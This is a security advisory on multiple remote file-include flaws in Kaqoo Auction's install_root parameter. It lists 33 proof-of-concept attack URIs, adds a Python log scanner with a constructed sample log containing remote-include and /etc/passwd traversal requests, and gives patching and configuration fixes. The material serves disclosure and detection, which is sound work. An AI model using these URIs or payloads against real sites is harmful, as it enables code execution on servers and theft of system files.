Kaqoo Auction Install_Root Multiple Remote File Include Vulnerabilities
BID:23211
Info
| Bugtraq ID: | 23211 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 30 2007 12:00AM |
| Updated: | Apr 02 2007 10:22PM |
| Credit: | ThE dE@Th is credited with the discovery of these vulnerabilities. |
| Vulnerable: | Kaqoo Auction 0 |
| Not Vulnerable: | Kaqoo Auction 2007033119 |
Discussion
Kaqoo Auction is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. The scripts under include/core/ and include/display/ can be requested directly, and the install_root value each of them uses when including further files can be supplied in the request, so an attacker can point it at a URL of their choosing or, with a suitable stream wrapper or path, at a local file.
Exploiting these issues may allow an attacker to execute arbitrary PHP code with the privileges of the web server, compromising the application and potentially the underlying system; other attacks are also possible. Inclusion of a remote URL depends on the PHP configuration permitting include() to fetch URLs (allow_url_fopen, and on PHP 5.2 and later allow_url_include); local-file inclusion through the same parameter does not.
Exploit / POC
Attackers can use a browser to exploit these issues.
The following proof-of-concept URIs are available. [Shell] is a placeholder for the URL of an attacker-hosted file containing PHP code; the script paths are relative to the application's web root:
http://www.example.com/include/core/support.inc.php?install_root=[Shell]
http://www.example.com/include/core/function.inc.php?install_root=[Shell]
http://www.example.com/include/core/rdal_object.inc.php?install_root=[Shell]
http://www.example.com/include/core/rdal_editor.inc.php?install_root=[Shell]
http://www.example.com/include/core/login.inc.php?install_root=[Shell]
http://www.example.com/include/core/request.inc.php?install_root=[Shell]
http://www.example.com/include/core/categories.inc.php?install_root=[Shell]
http://www.example.com/include/display/item/save.inc.php?install_root=[Shell]
http://www.example.com/include/display/item/preview.inc.php?install_root=[Shell]
http://www.example.com/include/display/item/edit_item.inc.php?install_root=[Shell]
http://www.example.com/include/display/item/new_item.inc.php?install_root=[Shell]
http://www.example.com/include/display/item/item_info.inc.php?install_root=[Shell]
http://www.example.com/include/display/search.inc.php?install_root=[Shell]
http://www.example.com/include/display/item_edit.inc.php?install_root=[Shell]
http://www.example.com/include/display/register_succsess.inc.php?install_root=[Shell]
http://www.example.com/include/display/context_menu.inc.php?install_root=[Shell]
http://www.example.com/include/display/item_repost.inc.php?install_root=[Shell]
http://www.example.com/include/display/balance.inc.php?install_root=[Shell]
http://www.example.com/include/display/featured.inc.php?install_root=[Shell]
http://www.example.com/include/display/user.inc.php?install_root=[Shell]
http://www.example.com/include/display/buynow.inc.php?install_root=[Shell]
http://www.example.com/include/display/install_complete.inc.php?install_root=[Shell]
http://www.example.com/include/display/fees_info.inc.php?install_root=[Shell]
http://www.example.com/include/display/user_feedback.inc.php?install_root=[Shell]
http://www.example.com/include/display/admin_balance.inc.php?install_root=[Shell]
http://www.example.com/include/display/activate.inc.php?install_root=[Shell]
http://www.example.com/include/display/user_info.inc.php?install_root=[Shell]
http://www.example.com/include/display/member.inc.php?install_root=[Shell]
http://www.example.com/include/display/add_bid.inc.php?install_root=[Shell]
http://www.example.com/include/display/items_filter.inc.php?install_root=[Shell]
http://www.example.com/include/display/my_info.inc.php?install_root=[Shell]
http://www.example.com/include/display/register.inc.php?install_root=[Shell]
http://www.example.com/include/display/leave_feedback.inc.php?install_root=[Shell]
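Detection logic for the requests above, as an added example that is not part of the advisory or of Kaqoo Auction: a Python scanner that reads Apache/nginx combined-format access-log lines, matches the request path against the 33 scripts in the proof-of-concept list, and reports every request in which the client supplies install_root. The log lines are constructed, and two points are assumptions made for the illustration rather than facts from the advisory: that install_root is only ever set server-side (so any client-supplied value is an attempt), and the list of stream wrappers treated as "remote".

```python
"""Flag attempts against the install_root parameter in web access logs.

Added example: the affected script list comes from the advisory's PoC URIs;
the log lines, the wrapper list and the rule that install_root is never
legitimately client-supplied are assumptions made for this illustration.
"""
import re
from urllib.parse import parse_qs, urlsplit

VULN_PARAM = "install_root"

# Scripts named in the advisory's proof-of-concept list, relative to the web root.
_CORE = "support function rdal_object rdal_editor login request categories".split()
_ITEM = "save preview edit_item new_item item_info".split()
_DISPLAY = (
    "search item_edit register_succsess context_menu item_repost balance featured "
    "user buynow install_complete fees_info user_feedback admin_balance activate "
    "user_info member add_bid items_filter my_info register leave_feedback"
).split()
AFFECTED_SCRIPTS = frozenset(
    [f"include/core/{n}.inc.php" for n in _CORE]
    + [f"include/display/item/{n}.inc.php" for n in _ITEM]
    + [f"include/display/{n}.inc.php" for n in _DISPLAY]
)

# Values that make include($install_root . "...") fetch or evaluate attacker-
# controlled code: URL wrappers (gated by allow_url_fopen / allow_url_include) and
# the php:// and data: wrappers, which reach code without an outbound connection
# (php://input and data: are also gated by allow_url_include; php://filter is not).
# Assumed list for this example.
REMOTE_PREFIXES = ("http://", "https://", "ftp://", "ftps://", "php://", "data:")

# Apache/nginx "combined" log format; only the fields used below are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)


def affected_script(path):
    """Return the advisory script that `path` ends with, or None.

    Suffix matching allows for the application living under a prefix such as
    /auction/ rather than at the web root.
    """
    for script in AFFECTED_SCRIPTS:
        if path.endswith("/" + script):
            return script
    return None


def classify_request(uri):
    """Return a finding dict if `uri` sets install_root on an affected script.

    parse_qs percent-decodes the value, so http%3A%2F%2F... is recognised too.
    Assumption: install_root is meant to be set by the application itself, so
    any client-supplied value is an attempt. "remote" marks values that use a
    wrapper yielding code execution; "other" covers traversal/local-path probes.
    """
    parts = urlsplit(uri)
    script = affected_script(parts.path)
    if script is None:
        return None
    values = parse_qs(parts.query, keep_blank_values=True).get(VULN_PARAM)
    if not values:
        return None
    value = values[0]
    kind = "remote" if value.lower().startswith(REMOTE_PREFIXES) else "other"
    return {"script": script, "value": value, "kind": kind}


def scan_log(text):
    """Parse combined-format log lines and return findings in log order."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hit = classify_request(m["uri"])
        if hit:
            hit.update(ip=m["ip"], ts=m["ts"], status=int(m["status"]))
            findings.append(hit)
    return findings


# Constructed sample log: two remote-include attempts (the second percent-encoded
# and against an install under /auction/), one benign request, and one traversal
# probe against the same parameter.
SAMPLE_LOG = """\
203.0.113.5 - - [30/Mar/2007:10:15:01 +0000] "GET /include/core/support.inc.php?install_root=http://198.51.100.7/c.txt? HTTP/1.1" 200 512
203.0.113.5 - - [30/Mar/2007:10:15:02 +0000] "GET /auction/include/display/user.inc.php?install_root=http%3A%2F%2F198.51.100.7%2Fc.txt%3F HTTP/1.1" 200 512
198.51.100.9 - - [30/Mar/2007:10:16:00 +0000] "GET /index.php?cat=3 HTTP/1.1" 200 2048
203.0.113.5 - - [30/Mar/2007:10:17:00 +0000] "GET /include/display/add_bid.inc.php?install_root=../../../../etc/passwd%00 HTTP/1.1" 200 100
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['kind']:6} {f['script']} <- {f['value']!r}")
```

The trailing `?` in the attacker URL is the usual RFI trick: it turns whatever the script appends to install_root into a query string for the attacker's host, so the fetched file is exactly the one the attacker chose. Because parse_qs decodes the value before the prefix check, the scanner does not depend on how the attacker encoded it; a 200 status on a flagged line is worth treating as a probable compromise rather than a failed probe.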
Solution / Fix
Solution:
The vendor has released version 2007033119 to address these issues. Contact the vendor for details on obtaining the appropriate updates.
Until the update is applied, setting allow_url_include (and, on PHP releases before 5.2, allow_url_fopen) to Off in php.ini stops include() from fetching http:// and ftp:// targets, and denying direct web access to the include/ directory removes the entry point the proof-of-concept URIs rely on. Neither replaces the fix: the same parameter can still be pointed at local files (including through php://filter) by any script that remains directly reachable.
References
References:
- Kaqoo Auction Homepage (Kaqoo)